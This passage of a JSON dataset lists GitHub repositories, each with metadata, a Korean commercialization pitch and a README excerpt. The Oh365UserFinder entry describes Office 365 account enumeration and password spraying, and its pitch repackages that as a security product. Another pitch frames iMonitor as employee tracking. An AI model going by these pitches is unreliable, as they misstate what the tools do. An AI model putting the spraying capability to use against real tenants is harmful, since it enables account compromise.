src=\"https://raw.github.com/http-party/node-http-proxy/master/doc/logo.png\"/>\n</p>\n\n# node-http-proxy [![Build Status](https://travis-ci.org/http-party/node-http-proxy.svg?branch=master)](https://travis-ci.org/http-party/node-http-proxy) [![codecov](https://codecov.io/gh/http-party/node-http-proxy/branch/master/graph/badge.svg)](https://codecov.io/gh/http-party/node-http-proxy)\n\n`node-http-proxy` is an HTTP programmable proxying library that supports\nwebsockets. It is suitable for implementing components such as reverse\nproxies and load balancers.\n\n### Table of Contents\n  * [Installation](#installation)\n  * [Upgrading from 0.8.x ?](#upgrading-from-08x-)\n  * [Core Concept](#core-concept)\n  * [Use Cases](#use-cases)\n    * [Setup a basic stand-alone proxy server](#setup-a-basic-stand-alone-proxy-server)\n    * [Setup a stand-alone proxy server with custom server logic](#setup-a-stand-alone-proxy-server-with-custom-server-logic)\n    * [Setup a stand-alone proxy ser","composite_score":0.0805,"license_safety_tag":"unknown"},{"name":"tachyons-css/tachyons","github_url":"https://github.com/tachyons-css/tachyons","stars":6,"language":"CSS","license":"mit","abandonment_months":5,"description":"# Tachyons CSS 상용화 분석\n\n## 왜 보물인가\n웹사이트 디자인을 빠르고 쉽게 만들 수 있도록 돕는 재사용 가능한 디자인 도구 모음으로, 개발 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 빌더 플랫폼에 Tachyons를 내장하여 사용자가 코딩 없이 전문적인 웹사이트를 몇 분 안에 만들 수 있","readme_excerpt":"# TACHYONS\n\nFunctional CSS for humans.\n\nQuickly build and design new UI without writing CSS.\n\n## Principles\n\n* Everything should be 100% responsive\n* Everything should be readable on any device\n* Everything should be as fast as possible\n* Designing in the browser should be easy\n* It should be easy to change any interface or part of an interface without breaking any existing interfaces\n* Doing one thing extremely well promotes reusability and reduces repetition\n* Documentation helps promote reusability and shared knowledge\n* CSS shouldn't impede accessibility or the default functionality of HTML\n* You should send the smallest possible amount of code to the user\n\n## Features\n\n* Mobile-first CSS architecture\n* 490 accessible color combinations\n* 8px baseline grid\n* Multiple debugging utilities to reduce layout struggles\n* Single-purpose class structure\n* Optimized for maximum gzip compression\n* Lightweight (~14kB)\n* Usable across projects\n* Growing open source component library\n* Works we","composite_score":0.0803,"license_safety_tag":"safe"},{"name":"troyeguo/koodo-reader","github_url":"https://github.com/troyeguo/koodo-reader","stars":29,"language":"JavaScript","license":"AGPL-3.0","abandonment_months":0,"description":"# Koodo Reader 상용화 분석\n\n## 왜 보물인가\n전자책과 PDF를 한곳에서 관리하고 읽을 수 있는 통합 독서 플랫폼으로, 개인 독서 경험을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 구독형 전자책 관리 앱으로 일반 독자들을 대상으로 월간 요금 모델로 운영\n2. **내부 업무 도구**: 기업이나 대학에서","readme_excerpt":"<div align=\"left\">\n\n[简体中文](https://github.com/koodo-reader/koodo-reader/blob/master/README_cn.md) | [हिंदी](https://github.com/koodo-reader/koodo-reader/blob/master/README_hi.md)\n|[Português](https://github.com/koodo-reader/koodo-reader/blob/master/README_pt.md) | [Indonesian](https://github.com/koodo-reader/koodo-reader/blob/master/README_id.md) | English\n\n</div>\n\n<div align=\"center\" >\n  <img src=\"https://dl.koodoreader.com/screenshots/logo.png\" width=\"96px\" height=\"96px\"/>\n</div>\n\n<h1 align=\"center\">\n  Koodo Reader\n</h1>\n\n<h3 align=\"center\">\n  A cross-platform ebook reader\n</h3>\n<div align=\"center\">\n\n[Download](https://koodoreader.com/en) | [Preview](https://web.koodoreader.com) | [Roadmap](https://koodoreader.com/en/roadmap) | [Document](https://koodoreader.com/en/document) | [Plugins](https://koodoreader.com/en/plugin)\n\n</div>\n\n## Preview\n\n<div align=\"center\">\n  <br/>\n  <br/>\n  <img src=\"https://dl.koodoreader.com/screenshots/7.png\" width=\"800px\">\n  <br/>\n  <br/>\n  <img src=\"https:","composite_score":0.0802,"license_safety_tag":"risky"},{"name":"jef/streetmerchant","github_url":"https://github.com/jef/streetmerchant","stars":11,"language":"TypeScript","license":"MIT","abandonment_months":2,"description":"# jef/streetmerchant 상품화 분석\n\n## 왜 보물인가\n온라인에서 빠르게 팔려나가는 인기 상품의 재입고 소식을 자동으로 알려주는 시스템으로, 구매 기회를 놓치지 않게 도와줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 게이밍 용품·최신 전자기기 구매 알림 구독 서비스로 운영하며, 월 구독료로 수익화\n2. **내부 업무 도구","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://jef.buzz/streetmerchant\"><img src=\"https://raw.githubusercontent.com/jef/streetmerchant/main/docs/assets/images/streetmerchant-banner.png\" /></a>\n</p>\n<p align=\"center\">\n  <strong>The world's easiest, most powerful stock checker</strong>\n</p>\n<p align=\"center\">\n  <em>To get started, visit <a href=\"https://jef.buzz/streetmerchant\">jef.buzz/streetmerchant</a></em>\n</p>\n\n## Features\n\nFirst and foremost, this service _will not_ automatically buy for you.\n\n- **Checks stock continuously** -- runs 24/7, 365, looking for the items you want.\n- **Ready for checkout** -- ability to add to cart when available and even opens the browser for you.\n- **Live dashboard** -- optional web interface with a matrix view of selected stores and series, filter controls, dotenv editing, and restart control.\n- **Notifications galore** -- when you're not by your computer, worry free with notifications to most platforms and devices when an item comes in stock.\n\n## Quick start\n\n","composite_score":0.0801,"license_safety_tag":"safe"},{"name":"channelcat/sanic","github_url":"https://github.com/channelcat/sanic","stars":8,"language":"Python","license":"mit","abandonment_months":2,"description":"# Sanic 저장소 분석\n\n## 왜 보물인가\n가볍고 빠른 웹 서버를 만들 수 있는 도구로, 작은 규모부터 중간 규모의 온라인 서비스를 빠르게 구축하는 데 유용합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 가벼운 실시간 데이터 처리 플랫폼 (예: 실시간 모니터링 대시보드)\n- **내부 업무 도구**: 회사 직원들이 사용하는 빠른 API 기","readme_excerpt":".. image:: https://raw.githubusercontent.com/sanic-org/sanic-assets/master/png/sanic-framework-logo-400x97.png\n    :alt: Sanic | Build fast. Run fast.\n\nSanic | Build fast. Run fast.\n=============================\n\n.. start-badges\n\n.. list-table::\n    :widths: 15 85\n    :stub-columns: 1\n\n    * - Build\n      - | |Tests|\n    * - Docs\n      - | |UserGuide| |Documentation|\n    * - Package\n      - | |PyPI| |PyPI version| |Wheel| |Supported implementations| |Code style ruff|\n    * - Support\n      - | |Forums| |Discord| |Awesome|\n    * - Stats\n      - | |Monthly Downloads| |Weekly Downloads| |Conda downloads|\n\n.. |UserGuide| image:: https://img.shields.io/badge/user%20guide-sanic-ff0068\n   :target: https://sanic.dev/\n.. |Forums| image:: https://img.shields.io/badge/forums-community-ff0068.svg\n   :target: https://community.sanicframework.org/\n.. |Discord| image:: https://img.shields.io/discord/812221182594121728?logo=discord&label=Discord&color=5865F2\n   :target: https://discord.gg/FARQzAEMAA\n..","composite_score":0.0793,"license_safety_tag":"safe"},{"name":"redux-saga/redux-saga","github_url":"https://github.com/redux-saga/redux-saga","stars":11,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# Redux-Saga 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션에서 복잡한 작업들을 간단하게 관리할 수 있게 해주는 오픈소스 도구로, 전 세계 수많은 개발팀이 실무에서 사용하고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 전자상거래 SaaS 플랫폼**\n- 주문 처리, 결제, 재고 관리 등 여러 단계의 복잡한 작업을 자동으로 처리하는 솔루션 판매\n","readme_excerpt":"<img src='https://redux-saga.js.org/img/Redux-Saga-Logo-Landscape.png' alt='Redux Logo Landscape' width='800px'>\n\n# redux-saga\n\n[![npm version](https://img.shields.io/npm/v/redux-saga.svg)](https://www.npmjs.com/package/redux-saga)\n[![CDNJS](https://img.shields.io/cdnjs/v/redux-saga.svg)](https://cdnjs.com/libraries/redux-saga)\n[![npm](https://img.shields.io/npm/dm/redux-saga.svg)](https://www.npmjs.com/package/redux-saga)\n[![Discord Shield](https://img.shields.io/discord/740090768164651008?label=discord&logo=discord)](https://discord.gg/AKz29HvK2h)\n[![OpenCollective](https://opencollective.com/redux-saga/backers/badge.svg)](#backers)\n[![OpenCollective](https://opencollective.com/redux-saga/sponsors/badge.svg)](#sponsors)\n\n`redux-saga` is a library that aims to make application side effects (i.e. asynchronous things like data fetching and impure things like accessing the browser cache) easier to manage, more efficient to execute, easy to test, and better at handling failures.\n\nThe ment","composite_score":0.0784,"license_safety_tag":"safe"},{"name":"tuoxie007/play_with_llvm","github_url":"https://github.com/tuoxie007/play_with_llvm","stars":6,"language":"C++","license":"unknown","abandonment_months":4,"description":"# play_with_llvm 상용화 분석\n\n## 왜 보물인가\n프로그래밍 언어와 컴파일러 기술의 핵심 엔진인 LLVM을 직접 다루고 학습할 수 있는 실습 자료로, 개발자들의 역량 강화와 맞춤형 개발 도구 창출의 기반이 됩니다.\n\n## 어디에 쓸 수 있나\n\n**1. 프로그래밍 교육 플랫폼 (SaaS)**\n- 대학교나 온라인 교육사이트에서 \"컴파일러 원리\" 실","readme_excerpt":"# Play with LLVM\n\n## 目录\n\n- [第1章 LLVM 总体介绍](ch01.md)\n\n- [第2章 体验LLVM](ch02.md)\n\n- [第3章 交叉编译](ch03.md)\n\n- [第4章 搭建集成开发环境](ch04.md)\n\n- [第5章 理解静态分析器](ch05.md)\n\n- [第6章 自制静态检查器](ch06.md)\n\n- [第7章 中间表示](ch07.md)\n\n- [第8章 开发一个编译器](ch08.md)\n\n","composite_score":0.0782,"license_safety_tag":"unknown"},{"name":"wecooperate/iMonitor","github_url":"https://github.com/wecooperate/iMonitor","stars":5,"language":"C++","license":"AGPL-3.0","abandonment_months":4,"description":"# iMonitor 사업화 분석\n\n## 왜 보물인가\n조직의 모든 활동을 자동으로 기록하고 분석해주는 투명성 관리 도구로, 팀의 생산성을 측정하고 보안을 강화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 원격근무 관리 SaaS**\n- 재택근무 직원의 실제 업무 시간과 활동 내역을 추적하는 구독형 서비스로 운영\n- 중소기업 HR팀에 월정액으로 판매\n\n","readme_excerpt":"[中文](./README_zh.md)\n\n## Introduction\n\niMonitor (Endpoint Behavior Analysis System) is a endpoint behavior monitoring and analysis software based on [iMonitorSDK](https://iMonitorSDK.com).\n\nProvides monitoring of system behaviors such as processes, files, registry, and networks. Support extensions and scripts, you can easily customize and add more functions. It can be used for virus analysis, software reverse engineering, intrusion detection, EDR, etc.\n\n## Screenshots\n![](./doc/all.gif)\n\n![](./doc/main_en.png)\n\n![](./doc/address_en.png)\n\n![](./doc/detail.png)\n\n![](./doc/snapshot.png)\n\n![](./doc/dll.png)\n\n![](./doc/script.png)\n\n## Version\n### 2.2.0（2022.10.30）\n\n- **Add scripting support** (you can use scripts to extend columns, customize matchers) Detailed reference [Script Development Guide](ttps://imonitorsdk.com/imonitor/script)\n- Optimized several user experiences\n- Fixed some minor issues\n\n### 2.1.1（2022.10.7）\n\n- Adjust the priority of grouping and filtering (previously grouped and","composite_score":0.0781,"license_safety_tag":"risky"},{"name":"dievus/Oh365UserFinder","github_url":"https://github.com/dievus/Oh365UserFinder","stars":9,"language":"Python","license":"unknown","abandonment_months":4,"description":"# Oh365UserFinder 상용화 분석\n\n## 왜 보물인가\nMicrosoft 365 사용자 정보를 자동으로 찾아주는 도구로, 기업의 직원 정보 관리나 보안 감시 업무를 획기적으로 단순화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 보안 감시 SaaS**\n- 회사 내 불법 계정이나 유령 계정을 자동 탐지하는 구독 서비스로 월 정액 판매\n\n","readme_excerpt":"# Oh365 User Finder v1.1.2\n\n[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/M4M03Q2JN)\n\n<p align=\"center\">\n  <img src=\"https://github.com/dievus/Oh365UserFinder/blob/main/images/oh365userfinder1.jpg\" />\n</p>\n\nOh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts.  The tool parses responses to identify the \"IfExistsResult\" flag is null or not, and responds appropriately if the user is valid.  The tool will attempt to identify false positives based on response, and either automatically create a waiting period to allow the throttling value to reset, or warn the user to increase timeouts between attempts.  \n\nOh365UserFinder can also easily identify if a domain exists in o365 using the -d or --domain flag.  This saves the trouble of copying the url from notes and entering it into the URL bar with the target domain.\n\nWith version 1.1.0, password spraying is now possible. If MFA is enabled, the tool SHOULD identify","composite_score":0.0779,"license_safety_tag":"unknown"},{"name":"AppPear/ChartView","github_url":"https://github.com/AppPear/ChartView","stars":6,"language":"Swift","license":"MIT","abandonment_months":3,"description":"# ChartView 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터를 한눈에 보기 좋게 표현해주는 도구로, 비즈니스 보고서나 대시보드가 필요한 모든 기업에 필수적입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 매출 현황, 고객 분석 등을 시각화하는 분석 대시보드 서비스\n- **내부 업무 도구**: 회사 성과 추적, 팀별 목표 달성률 모니터링","readme_excerpt":"# SwiftUICharts\n\nSwiftUICharts is a composable, SwiftUI-native chart library for iOS 13+.\n\n`2.0.0` is a major release focused on immutable configuration, environment-driven composition, and modifier-based APIs.\n\n<p align=\"center\">\n<img src=\"Resources/linevid2.gif\" width=\"30%\"/> <img src=\"Resources/barvid2.gif\" width=\"30%\"/> <img src=\"Resources/pievid2.gif\" width=\"30%\"/>\n</p>\n\n## AI Agent Quick Context\n\nUse this section when an AI agent generates code against this package.\n\n### API contract\n\n- Use only `2.x` composable APIs.\n- Do not use legacy `1.x` types or mutating chains.\n- Build charts with `ViewModifier` composition.\n- Keep data source semantics explicit:\n  - `chartData([Double])` = categorical slots\n  - `chartData([(Double, Double)])` = numeric/continuous domain\n\n### Use these APIs\n\n| Task | API |\n| --- | --- |\n| Set data | `chartData(...)` |\n| Set ranges | `chartXRange(...)`, `chartYRange(...)` |\n| Style chart | `chartStyle(...)` |\n| Grid config | `chartGridLines`, `chartGridStr","composite_score":0.0779,"license_safety_tag":"safe"},{"name":"amitshekhariitbhu/Android-Debug-Database","github_url":"https://github.com/amitshekhariitbhu/Android-Debug-Database","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":4,"description":"# Android-Debug-Database 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱 개발자들이 앱 내부의 데이터를 웹 브라우저에서 직접 확인하고 수정할 수 있게 해주는 강력한 개발 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **앱 개발 회사의 내부 개발 도구 SaaS**: 프리랜서 개발자나 스타트업이 구독 기반으로 고급 디버깅 기능을 이용하는 서비","readme_excerpt":"<img src=https://raw.githubusercontent.com/amitshekhariitbhu/Android-Debug-Database/master/assets/debug_db_banner.png >\n\n# Android Debug Database\n\n## Android Debug Database is a powerful library for debugging databases and shared preferences in Android applications\n\n### Android Debug Database allows you to view databases and shared preferences directly in your browser in a very simple way\n\n### What can Android Debug Database do?\n\n* See all the databases.\n* See all the data in the shared preferences used in your application.\n* Run any sql query on the given database to update and delete your data.\n* Directly edit the database values.\n* Directly edit the shared preferences.\n* Directly add a row in the database.\n* Directly add a key-value in the shared preferences.\n* Delete database rows and shared preferences.\n* Search in your data.\n* Sort data.\n* Download database.\n* Debug Room inMemory database.\n\n## About me\n\nHi, I am Amit Shekhar, Founder @ [Outcome School](https://outcomeschool.com) ","composite_score":0.0774,"license_safety_tag":"safe"},{"name":"AllThingsSmitty/must-watch-css","github_url":"https://github.com/AllThingsSmitty/must-watch-css","stars":6,"language":"","license":"cc0-1.0","abandonment_months":6,"description":"# AllThingsSmitty/must-watch-css 분석\n\n## 왜 보물인가\n웹사이트를 예쁘게 만드는 방법(CSS)에 대한 최고의 학습 자료들을 한곳에 모아놓은 가이드 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 학습 플랫폼**: 초보자부터 전문가까지 CSS를 배울 수 있는 온라인 교육 서비스로 운영\n2. **디자인 회사의 내부 교육 자","readme_excerpt":"<p align=\"center\">\n  <img src=\"./assets/img/tv.svg\" width=\"200\" alt=\"TV icon with play button\">\n</p>\n\n# Must-Watch CSS [![Awesome](https://awesome.re/badge-flat.svg)](https://awesome.re)\n\nThis is a collection of well-received talks about CSS covering topics such as CSS Grid, flexbox, custom variables, performance, frameworks, Sass, tooling, and more.\n\n> [!TIP]\n> **Like JavaScript? Check out [Must-Watch JavaScript](https://github.com/AllThingsSmitty/must-watch-javascript)!** For other great lists check out [@sindresorhus](https://github.com/sindresorhus/)'s curated list of [awesome lists](https://github.com/sindresorhus/awesome/).\n\n- [Contribution Guidelines](CONTRIBUTING.md)\n\n### 2025\n\n1. [**25 New & Rad Feature of CSS**](https://www.youtube.com/watch?v=QW6GECIzvsw): Adam Argyle, CascadiaJS `30:03`\n\n### 2024\n\n1. [**The \"Other\" C in CSS**](https://www.youtube.com/watch?v=ob_M_qXeDVE): Sara Soueidan, CSS Day 2024 `55:55`\n\n### 2022\n\n1. [**CSS Variable Secrets**](https://www.youtube.com/wa","composite_score":0.0772,"license_safety_tag":"unknown"},{"name":"ameraner/dsen2-cr","github_url":"https://github.com/ameraner/dsen2-cr","stars":5,"language":"Python","license":"GPL-3.0","abandonment_months":4,"description":"# ameraner/dsen2-cr 상용화 분석\n\n## 왜 보물인가\n위성 사진을 더 선명하고 정확하게 처리해주는 기술로, 도시 계획, 농업, 환경 모니터링 등 다양한 산업에서 실제 가치를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 농민이 웹사이트에서 자신의 논밭 위성 사진을 업로드하면 작물 상태를 자동으로 분석해주는 서비스","readme_excerpt":"# Cloud removal in Sentinel-2 imagery using a deep residual neural network and SAR-optical data fusion\n[![BPA](https://img.shields.io/badge/Winner-ISPRS%20U.V.%20Helava%20Award%202020--2021-brightgreen)](https://www.isprs.org/society/awards/helava/2020_2021award.aspx)\n[![BPA](https://img.shields.io/badge/Winner-ISPRS%20JPRS%20Best%20Paper%20Award%202020-brightgreen)](https://www.journals.elsevier.com/isprs-journal-of-photogrammetry-and-remote-sensing/news/the-u-v-helava-award-best-paper-volumes-159-170-2020)\n\n---\n> [!NOTE]  \n> As I'm not able to properly replicate results and test the code, if you try out this code, encounter some issue and are able to solve it, you're very welcome to contribute to this repository with a Pull Request! This will help more people to make use of this model. Thank you :) \n\n---\n\n![Paper preview](doc/paper.JPG)\n>\n> _Example results from the final setup of DSen2-CR using the CARL loss. Left is the input cloudy image, middle is the predicted image, right is th","composite_score":0.077,"license_safety_tag":"restricted"},{"name":"sony/sonyflake","github_url":"https://github.com/sony/sonyflake","stars":7,"language":"Go","license":"mit","abandonment_months":3,"description":"# Sony Sonyflake 분석\n\n## 왜 보물인가\n인터넷 서비스에서 필요한 '고유한 번호 생성기'를 매우 빠르고 안정적으로 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 회원가입 시 각 사용자에게 부여하는 고유 ID를 빠르게 생성하는 백엔드 서비스\n2. **내부 업무 도구**: 대규모 회사의 주문, 거래, 로그 기록을","readme_excerpt":"# Sonyflake\n\n[![GoDoc](https://pkg.go.dev/badge/github.com/sony/sonyflake/v2?utm_source=godoc)](https://pkg.go.dev/github.com/sony/sonyflake/v2)\n[![Go Report Card](https://goreportcard.com/badge/github.com/sony/sonyflake/v2)](https://goreportcard.com/report/github.com/sony/sonyflake/v2)\n\nSonyflake is a distributed unique ID generator inspired by [Twitter's Snowflake](https://blog.twitter.com/2010/announcing-snowflake).  \n\nSonyflake focuses on lifetime and performance on many host/core environment.\nSo it has a different bit assignment from Snowflake.\nBy default, a Sonyflake ID is composed of\n\n    39 bits for time in units of 10 msec\n     8 bits for a sequence number\n    16 bits for a machine id\n\nAs a result, Sonyflake has the following advantages and disadvantages:\n\n- The lifetime (174 years) is longer than that of Snowflake (69 years)\n- It can work in more distributed machines (2^16) than Snowflake (2^10)\n- It can generate 2^8 IDs per 10 msec at most in a single instance (fewer than Sn","composite_score":0.0769,"license_safety_tag":"safe"},{"name":"SwiftKickMobile/SwiftMessages","github_url":"https://github.com/SwiftKickMobile/SwiftMessages","stars":7,"language":"Swift","license":"mit","abandonment_months":4,"description":"# SwiftMessages 시장 분석\n\n## 왜 보물인가\n스마트폰 앱에서 사용자에게 중요한 소식을 예쁘게 띄워주는 기술로, 모든 모바일 앱 개발자가 필요로 하는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 뱅킹 서비스**: 송금 완료, 카드 승인 알림 등을 사용자에게 보기 좋게 표시하는 SaaS 제공\n2. **배달 앱 개발사 지원 도구**","readme_excerpt":"# SwiftMessages\n\n[![Twitter: @TimothyMoose](https://img.shields.io/badge/contact-@TimothyMoose-blue.svg?style=flat)](https://twitter.com/TimothyMoose)\n[![Version](https://img.shields.io/cocoapods/v/SwiftMessages.svg?style=flat)](http://cocoadocs.org/docsets/SwiftMessages)\n[![License](https://img.shields.io/cocoapods/l/SwiftMessages.svg?style=flat)](http://cocoadocs.org/docsets/SwiftMessages)\n[![Platform](https://img.shields.io/cocoapods/p/SwiftMessages.svg?style=flat)](http://cocoadocs.org/docsets/SwiftMessages)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n\n<p align=\"center\">\n  <img src=\"./Design/swiftmessages.png\" />\n</p>\n\n## Overview\n\n🔥🔥🔥 **UPDATE** SwiftUI support in in Xcode 26 requries 10.0.2!\n\nSwiftMessages is a very flexible view and view controller presentation library for UIKit and SwiftUI.\n\nMessage views and view controllers can be displayed at the top, bottom, or center of the screen, o","composite_score":0.0768,"license_safety_tag":"safe"},{"name":"project-serum/anchor","github_url":"https://github.com/project-serum/anchor","stars":5,"language":"Rust","license":"Apache-2.0","abandonment_months":0,"description":"# Anchor 저장소 분석\n\n## 왜 보물인가\n블록체인 프로그래밍을 쉽게 만들어주는 도구로, 복잡한 암호화폐 기술을 일반 개발자도 빠르게 배울 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소 SaaS**: 블록체인 기반 거래 플랫폼을 빠르게 구축하고 월 구독료로 수익화\n2. **금융사 내부 도구**: 은행이나 자산운용사가 블록체인 거래 ","readme_excerpt":"<div align=\"center\">\n  <img height=\"170x\" src=\"https://pbs.twimg.com/media/FVUVaO9XEAAulvK?format=png&name=small\" />\n\n  <h1>Anchor</h1>\n\n  <p>\n    <strong>Solana Program Framework</strong>\n  </p>\n\n  <p>\n    <a href=\"https://github.com/solana-foundation/anchor/actions\"><img alt=\"Build Status\" src=\"https://github.com/solana-foundation/anchor/actions/workflows/tests.yaml/badge.svg\" /></a>\n    <a href=\"https://anchor-lang.com\"><img alt=\"Tutorials\" src=\"https://img.shields.io/badge/docs-tutorials-blueviolet\" /></a>\n    <a href=\"https://discord.gg/NHHGSXAnXk\"><img alt=\"Discord Chat\" src=\"https://img.shields.io/discord/889577356681945098?color=blueviolet\" /></a>\n    <a href=\"https://opensource.org/licenses/Apache-2.0\"><img alt=\"License\" src=\"https://img.shields.io/github/license/solana-foundation/anchor?color=blueviolet\" /></a>\n  </p>\n</div>\n\n[Anchor](https://www.anchor-lang.com/) is a framework providing several convenient developer tools for writing Solana programs (sometimes called 'smart ","composite_score":0.0768,"license_safety_tag":"safe"},{"name":"loremwalker/WebSiteUseful","github_url":"https://github.com/loremwalker/WebSiteUseful","stars":7,"language":"Python","license":"unknown","abandonment_months":0,"description":"# WebSiteUseful 저장소 분석\n\n## 왜 보물인가\n웹사이트를 더 효과적으로 만드는 데 필요한 도구들을 한곳에 모아놓은 실용적인 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 최적화 SaaS**: 소규모 사업가들이 자신의 홈페이지를 개선할 수 있도록 돕는 구독형 서비스\n2. **마케팅 에이전시 내부 도구**: 광고주들의 웹사이트 성","readme_excerpt":"\n<!--\n</a><img align=\"right\" src=\"https://fastly.jsdelivr.net/gh/hoochanlon/w3-goto-world/W3UnitTest/mof2.PNG\" width=\"250 \" height=\"250\" /></a><a><img align=\"right\" src=\"https://fastly.jsdelivr.net/gh/hoochanlon/w3-goto-world/W3UnitTest/mof1.PNG\" width=\"250 \" height=\"250\" />\n\n[![LICENSE](https://img.shields.io/badge/license-Anti%20996-blue.svg)](https://github.com/996icu/996.ICU/blob/master/LICENSE) [![996.icu](https://img.shields.io/badge/link-996.icu-red.svg)](https://996.icu) \n\n-->\n\n<!--![冲出你的窗口](https://fastly.jsdelivr.net/gh/hoochanlon/w3-goto-world/W3UnitTest/ccndck.png)-->\n\n<h1 align=\"center\"> 免责声明 </h1>\n\n<p align=\"center\"> <a href=\"https://github.com/hoochanlon/hamulete/blob/master/README_JP.md\"> 日本語 </a> | <a href=\"https://github.com/hoochanlon/hamulete/blob/master/README.md\"> 中文 </a>  </p>\n\n该库并不提供任何资料，所有内容均为搬运。仅面向海外华人及社科研究者，切勿用于其他用途！中国用户请自觉关闭，并在24小时之内删掉与本项目相关的一切内容。否则出现一切问题，项目作者概不负责！<br>\n\n# ***<ruby>城中村哈姆雷特<rp>（</rp><rt>《信息网络社科整合资源库》</rt><rp></rp></ruby>***\n\n<a href=\"https://n","composite_score":0.0767,"license_safety_tag":"unknown"},{"name":"shuding/stable-hash","github_url":"https://github.com/shuding/stable-hash","stars":6,"language":"TypeScript","license":"unknown","abandonment_months":4,"description":"# stable-hash 기술 분석\n\n## 왜 보물인가\n동일한 데이터를 여러 컴퓨터에서 처리할 때 같은 결과를 보장하는 기술로, 데이터 일관성이 중요한 모든 디지털 서비스의 신뢰도를 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **캐시 관리 SaaS**: 웹사이트 속도 최적화 서비스에서 여러 서버의 데이터가 동기화되도록 보장\n- **결제 시스템 API","readme_excerpt":"# stable-hash\n\nA tiny and fast (481b <sup>[unpkg](https://unpkg.com/stable-hash@0.0.3/dist/index.mjs)</sup>) lib for \"stably hashing\" a JavaScript value. Originally created for [SWR](https://github.com/vercel/swr).\n\nIt's similar to `JSON.stringify(value)`, but:\n1. Supports any JavaScript value (BigInt, NaN, Symbol, function, class, ...)\n2. Sorts object keys (stable)\n3. Supports circular objects\n\n## Use\n\n```bash\nyarn add stable-hash\n```\n\n```js\nimport hash from 'stable-hash'\n\nhash(anyJavaScriptValueHere) // returns a string\n```\n\n## Examples\n\n### Primitive Value\n\n```js\nhash(1)\nhash('foo')\nhash(true)\nhash(undefined)\nhash(null)\nhash(NaN)\n```\n\nBigInt:\n\n```js\nhash(1) === hash(1n)\nhash(1) !== hash(2n)\n```\n\nSymbol:\n\n```js\nhash(Symbol.for('foo')) === hash(Symbol.for('foo'))\nhash(Symbol.for('foo')) === hash(Symbol('foo'))\nhash(Symbol('foo')) === hash(Symbol('foo'))\nhash(Symbol('foo')) !== hash(Symbol('bar'))\n```\n\n_Since Symbols cannot be serialized, stable-hash simply uses its description as the ","composite_score":0.0767,"license_safety_tag":"unknown"},{"name":"aws-samples/serverless-graalvm-demo","github_url":"https://github.com/aws-samples/serverless-graalvm-demo","stars":7,"language":"Java","license":"MIT-0","abandonment_months":4,"description":"# aws-samples/serverless-graalvm-demo 분석\n\n## 왜 보물인가\n복잡한 서버 없이 간단한 코드만으로 빠르고 저렴하게 웹 서비스를 만들 수 있는 실제 구현 예제입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 사용량에 따라 비용을 내는 자동 스케일링 웹 애플리케이션 (예: 온라인 이미지 변환 서비스)\n- **내부 업","readme_excerpt":"## Serverless GraalVM Demo\n\n![build](https://github.com/aws-samples/serverless-graalvm-demo/actions/workflows/maven.yml/badge.svg)\n\n<p align=\"center\">\n  <img src=\"imgs/diagram.png\" alt=\"Architecture diagram\"/>\n</p>\n\nThis is a simple serverless application built in Java and uses the GraalVM native-image tool. It consists of an\n[Amazon API Gateway](https://aws.amazon.com/api-gateway/) backed by four [AWS Lambda](https://aws.amazon.com/lambda/)\nfunctions and an [Amazon DynamoDB](https://aws.amazon.com/dynamodb/) table for storage.\n\n## Requirements\n\n- [AWS CLI](https://aws.amazon.com/cli/)\n- [AWS CDK](https://aws.amazon.com/cdk/)\n- Java 21\n- Maven 3.5 +\n- [Artillery](https://www.artillery.io/) for load-testing the application \n\n## Software\n\nWithin the software folder is the products maven project. This single maven project contains all the code for all four\nLambda functions. It uses the hexagonal architecture pattern to decouple the entry points, from the main domain logic\nand the storage ","composite_score":0.0766,"license_safety_tag":"safe"},{"name":"airbnb/epoxy","github_url":"https://github.com/airbnb/epoxy","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":4,"description":"# Epoxy 저장소 분석\n\n## 왜 보물인가\n모바일 앱에서 복잡한 리스트 화면을 쉽게 만들 수 있도록 도와주는 개발 도구로, 앱 개발 비용과 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소매점이나 음식점 체인점들이 이용하는 POS(판매 관리) 앱에 상품 목록, 주문 내역 등 리스트 화면 제공\n- **내부 업무 ","readme_excerpt":"[![Build Status](https://travis-ci.com/airbnb/epoxy.svg?branch=master)](https://travis-ci.com/github/airbnb/epoxy)\n[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.airbnb.android/epoxy/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.airbnb.android/epoxy)\n[![GitHub license](https://img.shields.io/github/license/airbnb/epoxy)](https://github.com/airbnb/epoxy/blob/master/LICENSE)\n![GitHub contributors](https://img.shields.io/github/contributors/airbnb/epoxy)\n\n# Epoxy\n\nEpoxy is an Android library for building complex screens in a RecyclerView. Models are automatically generated from custom views or databinding layouts via annotation 